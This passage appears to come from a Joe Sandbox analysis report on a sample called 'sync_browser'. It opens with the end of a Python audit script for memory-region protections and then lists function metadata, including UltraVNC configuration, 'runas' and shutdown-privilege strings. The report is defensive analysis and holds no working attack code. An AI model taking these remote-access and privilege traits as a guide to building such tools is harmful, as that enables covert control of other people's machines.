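if __name__ == "__main__":
    regions = [parse_sdmp(n) for n in PAGE_REGIONS]
    for off, prot, kind in image_layout(regions, IMAGE_BASE):
        print(f"+{off:#08x}  {prot:<24} {kind}")
    print("findings:", audit(regions) or "none")
    print("with constructed RWX region:", audit(regions + [parse_sdmp(INJECTED_REGION)]))
```

Read against the report's own list, the decoded map is what a cleanly loaded image looks like: the header page at +0x0 is PAGE_READONLY, the only PAGE_EXECUTE_READ region starts at +0x1000 (matching the "Source File" code region), the data regions are PAGE_READWRITE or PAGE_WRITECOPY, and every region is MEM_IMAGE, so `audit` returns nothing. Appending the constructed private RWX region produces two findings, which is the pattern to look for when the same report shows code lifted from a region that does not belong to any module.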
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                       • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Create$FileModuleNamePrivateProfile
                                                                      • String ID: Software\UltraVNC$UseRegistry$admin$mslogon
                                                                      • API String ID: 27673491-2056936749
                                                                      • Opcode ID: 49ca59dd5d1ce4bd8261c69328d6c9401fd879975b581b5eca3f4e4a4bfb3057
                                                                      • Instruction ID: 7c6d3f5391a9b079b3d0208db66bbf9e81a0a4c4aec631e66c1cccd55cda9593
                                                                      • Opcode Fuzzy Hash: 49ca59dd5d1ce4bd8261c69328d6c9401fd879975b581b5eca3f4e4a4bfb3057
                                                                      • Instruction Fuzzy Hash: AD21153651CB4A92E760AF14F4A07AAF364FB84754FC01136E68D47A59DF3CD154CB11
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                       • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Window$RectVisible$Foreground
                                                                      • String ID:
                                                                      • API String ID: 2499709836-0
                                                                      • Opcode ID: 48f1e47169105f78f1c5671409c72268c28db6c5ed06a4c25a4347c71102ace5
                                                                      • Instruction ID: b091fbb526b79ea474736280845ad2cec64ec80ae1070b4f1466b06f20db922b
                                                                      • Opcode Fuzzy Hash: 48f1e47169105f78f1c5671409c72268c28db6c5ed06a4c25a4347c71102ace5
                                                                      • Instruction Fuzzy Hash: DAD1BE32B086958EEB14DFB9E0506EC77B2BB48B88B50453AEE0DA7B4CDF349441C761
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                       • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ProcessToken$AdjustCurrentExitLookupOpenPrivilegePrivilegesValueVersionWindows
                                                                      • String ID: SeShutdownPrivilege
                                                                      • API String ID: 337752880-3733053543
                                                                      • Opcode ID: ccb4f6b8adec0e5263e9b53491d22d093fe75a13b47b81360652c4a9f3302a15
                                                                      • Instruction ID: a075996f976d3a68ee88ab67ea717a22a290065e324fc5aab33529d55c437c38
                                                                      • Opcode Fuzzy Hash: ccb4f6b8adec0e5263e9b53491d22d093fe75a13b47b81360652c4a9f3302a15
                                                                      • Instruction Fuzzy Hash: F3116371918B4685E760EB20F8657AAF3A0FB84F45FC01036E58E87A58DF7CD049CB11
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                       • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExecuteFileForegroundModuleNameShellVersionWindow
                                                                      • String ID: -softwarecad$p$runas
                                                                      • API String ID: 397093096-2208381721
                                                                      • Opcode ID: fb4efa84501b81446d58e4aa4c9b0a5607d51e55c45e595c5f15ef2dbf94494a
                                                                      • Instruction ID: 2c99361622b97b7a108beb4b7a441968e7debabda6dc46e052365c39645098ea
                                                                      • Opcode Fuzzy Hash: fb4efa84501b81446d58e4aa4c9b0a5607d51e55c45e595c5f15ef2dbf94494a
                                                                      • Instruction Fuzzy Hash: 7F11FA35518B8585E770AB10F4A839AB3A0FB88B45F800236D68D42B58EF7CD148CB11
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                       • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
                                                                      • String ID:
                                                                      • API String ID: 3778485334-0
                                                                      • Opcode ID: 06a598ca6a92d0ea32fba2d50ca2368aa251c6b52815f87316808892bb3a9e84
                                                                      • Instruction ID: 61ad7c7f7ef6442528be010223ba7332613bcace77553bf322cfaa08734ef592
                                                                      • Opcode Fuzzy Hash: 06a598ca6a92d0ea32fba2d50ca2368aa251c6b52815f87316808892bb3a9e84
                                                                      • Instruction Fuzzy Hash: 2B311D3590CB8A85E760BB55F8603A9B3A0FB44B54F901037D58D87769EF7CE444CB22
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                       • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: File$FindFirstModuleName
                                                                      • String ID: *.dsm
                                                                      • API String ID: 1519589655-1970359449
                                                                      • Opcode ID: 5ec88052d5adebc3db2df3dc82cb1158468950cb75ad4b7486c7f1220c09e049
                                                                      • Instruction ID: 320da5a49b54d6e4cad4dbb97f4e2fd0260a4b3ebf466b983ab64b51e3d1db61
                                                                      • Opcode Fuzzy Hash: 5ec88052d5adebc3db2df3dc82cb1158468950cb75ad4b7486c7f1220c09e049
                                                                      • Instruction Fuzzy Hash: 7731452560868995EB60AB34B8543FBA390FB48BB4F805336DA7D836D8EE3CD505C711
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                       • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: PrivateProfile$FileModuleNameQueryValue
                                                                      • String ID: UseRegistry$admin$admin_auth
                                                                      • API String ID: 1028385882-3376419731
                                                                      • Opcode ID: d5f9d5c0af733a8a18aaad5fcf10d0583086e22d43d578638aeb5c775166167f
                                                                      • Instruction ID: 377e16779f643257df692fd2b7d6d841aca463f758e09a2badd70a901618d0b7
                                                                      • Opcode Fuzzy Hash: d5f9d5c0af733a8a18aaad5fcf10d0583086e22d43d578638aeb5c775166167f
                                                                      • Instruction Fuzzy Hash: A2215631618A4AC1EB60DB20F8647AAB3A0FB89B94FC01036FA4D83B58DF3DD545CB51
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                       • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Close$FileModuleNamePrivateProfile
                                                                      • String ID: UseRegistry$admin
                                                                      • API String ID: 3032973919-2802730080
                                                                      • Opcode ID: f394e00a07ad10370d3a9fb3f4169cee617936cad869a8b398f64821c48fdab7
                                                                      • Instruction ID: b89a1c1252df8805c41515d19df1289bff6a9518ccdd328b58b09dc1be3b90ad
                                                                      • Opcode Fuzzy Hash: f394e00a07ad10370d3a9fb3f4169cee617936cad869a8b398f64821c48fdab7
                                                                      • Instruction Fuzzy Hash: A8010825A19A0A81FE62BB24F8743B9A360FF89F54FC01137D90E82568DF3CE514C672
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                       • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                      • String ID:
                                                                      • API String ID: 1239891234-0
                                                                      • Opcode ID: cab22b7f63e68bd4fe1f659d6095baf5ecdb6c5b170d8f81b70fd2e30acf9a7e
                                                                      • Instruction ID: ce527f5dcef28025c71df4e93ff6693ea36b51458934c53bb3826c190ba64891
                                                                      • Opcode Fuzzy Hash: cab22b7f63e68bd4fe1f659d6095baf5ecdb6c5b170d8f81b70fd2e30acf9a7e
                                                                      • Instruction Fuzzy Hash: E9318732618B8685D720DF25F8643AEB3A0FB84B54F910136EA9D83B58DF7CC545CB11
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Iconic
                                                                      • String ID: 0
                                                                      • API String ID: 110040809-4108050209
                                                                      • Opcode ID: ada12bffe0504ce749bfb447d148339bb7949db47e61c86c1c89a82587fb054e
                                                                      • Instruction ID: 245091ea8fe2d6400510e1dbc0eef2c19294d864ed650804f8a58f07779d6a39
                                                                      • Opcode Fuzzy Hash: ada12bffe0504ce749bfb447d148339bb7949db47e61c86c1c89a82587fb054e
                                                                      • Instruction Fuzzy Hash: 4AA1AB366042858BE7589F39D5507ACF7E0FB48F54F54803AEB49C7289DB38E864CB22
                                                                      APIs
                                                                        • Part of subcall function 00007FF7E507D390: GetModuleFileNameA.KERNEL32 ref: 00007FF7E507D3BB
                                                                      • GetPrivateProfileIntA.KERNEL32 ref: 00007FF7E50C7D89
                                                                        • Part of subcall function 00007FF7E50C7650: GetPrivateProfileIntA.KERNEL32 ref: 00007FF7E50C7689
                                                                        • Part of subcall function 00007FF7E50C7650: RegCreateKeyExA.ADVAPI32 ref: 00007FF7E50C76DD
                                                                        • Part of subcall function 00007FF7E50C7650: RegCreateKeyExA.ADVAPI32 ref: 00007FF7E50C7722
                                                                        • Part of subcall function 00007FF7E50C78E0: GetPrivateProfileIntA.KERNEL32 ref: 00007FF7E50C792E
                                                                        • Part of subcall function 00007FF7E50C78E0: RegQueryValueExA.ADVAPI32 ref: 00007FF7E50C796A
                                                                        • Part of subcall function 00007FF7E50C78E0: RegQueryValueExA.ADVAPI32 ref: 00007FF7E50C79B2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: PrivateProfile$CreateQueryValue$FileModuleName
                                                                      • String ID: UseRegistry$admin$group3
                                                                      • API String ID: 1728753321-3776872688
                                                                      • Opcode ID: da8d5682ec0159b53c6e6ac02bc9a146a6fe897d91bd88be9db6412787fbbace
                                                                      • Instruction ID: 7bbdcdc64745bc88db493a489ba394dfcce9c96eedf9904d90e38c23dda334e5
                                                                      • Opcode Fuzzy Hash: da8d5682ec0159b53c6e6ac02bc9a146a6fe897d91bd88be9db6412787fbbace
                                                                      • Instruction Fuzzy Hash: 8C111225E1854A81EA61FB34F4713F9A360FF89B44FC00037E64D8666ADE3CE104CB61
                                                                      APIs
                                                                        • Part of subcall function 00007FF7E507D390: GetModuleFileNameA.KERNEL32 ref: 00007FF7E507D3BB
                                                                      • GetPrivateProfileIntA.KERNEL32 ref: 00007FF7E50C7EED
                                                                        • Part of subcall function 00007FF7E50C7650: GetPrivateProfileIntA.KERNEL32 ref: 00007FF7E50C7689
                                                                        • Part of subcall function 00007FF7E50C7650: RegCreateKeyExA.ADVAPI32 ref: 00007FF7E50C76DD
                                                                        • Part of subcall function 00007FF7E50C7650: RegCreateKeyExA.ADVAPI32 ref: 00007FF7E50C7722
                                                                        • Part of subcall function 00007FF7E50C77F0: GetPrivateProfileIntA.KERNEL32 ref: 00007FF7E50C7840
                                                                        • Part of subcall function 00007FF7E50C77F0: RegQueryValueExA.ADVAPI32 ref: 00007FF7E50C787D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: PrivateProfile$Create$FileModuleNameQueryValue
                                                                      • String ID: UseRegistry$admin$locdom2
                                                                      • API String ID: 1788981264-80830018
                                                                      • Opcode ID: 453e7d21788d8a281cd3351b72fc90b6b80e6296ed96c2d368ba72f2aba873be
                                                                      • Instruction ID: a52a83173d50123e7d4f167381442a9382a4988487f21ea5ea1440b55f502b1e
                                                                      • Opcode Fuzzy Hash: 453e7d21788d8a281cd3351b72fc90b6b80e6296ed96c2d368ba72f2aba873be
                                                                      • Instruction Fuzzy Hash: 51017125E1854E81FA21FB34B4B53BA9391EF99B04FC00437E50DC559ADE3CE105C672
                                                                      APIs
                                                                        • Part of subcall function 00007FF7E507D390: GetModuleFileNameA.KERNEL32 ref: 00007FF7E507D3BB
                                                                      • GetPrivateProfileIntA.KERNEL32 ref: 00007FF7E50C7E50
                                                                        • Part of subcall function 00007FF7E50C7650: GetPrivateProfileIntA.KERNEL32 ref: 00007FF7E50C7689
                                                                        • Part of subcall function 00007FF7E50C7650: RegCreateKeyExA.ADVAPI32 ref: 00007FF7E50C76DD
                                                                        • Part of subcall function 00007FF7E50C7650: RegCreateKeyExA.ADVAPI32 ref: 00007FF7E50C7722
                                                                        • Part of subcall function 00007FF7E50C77F0: GetPrivateProfileIntA.KERNEL32 ref: 00007FF7E50C7840
                                                                        • Part of subcall function 00007FF7E50C77F0: RegQueryValueExA.ADVAPI32 ref: 00007FF7E50C787D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
